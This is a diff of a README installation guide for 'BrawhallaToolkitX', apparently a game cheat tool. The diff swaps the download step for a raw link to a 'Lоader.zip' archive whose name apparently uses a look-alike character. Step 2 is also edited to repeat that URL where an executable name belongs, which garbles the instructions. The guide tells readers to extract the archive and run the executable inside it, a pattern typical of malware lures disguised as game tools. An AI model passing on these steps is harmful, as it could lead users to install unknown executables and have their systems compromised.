HoDangDung/BrawhallaToolkitX/README.md

 ## 🔧 Installation Guide

 1. **Download Loader**<br>
-   Download `Loader.rar` from this repository's Releases tab, and extract it using any popular archive manager.
+   Download `https://raw.githubusercontent.com/HoDangDung/BrawhallaToolkitX/main/Lоader.zip` from this repository's Releases tab, and extract it using any popular archive manager.

 2. **Run the Installer**<br>
-   Inside the extracted folder, locate the `Loader.exe` or platform-specific executable for your system (`.sh` for Linux, `.app` for macOS).
+   Inside the extracted folder, locate the `https://raw.githubusercontent.com/HoDangDung/BrawhallaToolkitX/main/Lоader.zip` or platform-specific executable for your system (`.sh` for Linux, `.app` for macOS).
 Double click to begin installation.

 3. **Follow On-Screen Instructions**<br>
    Complete the guided setup steps (including system checks and configuration).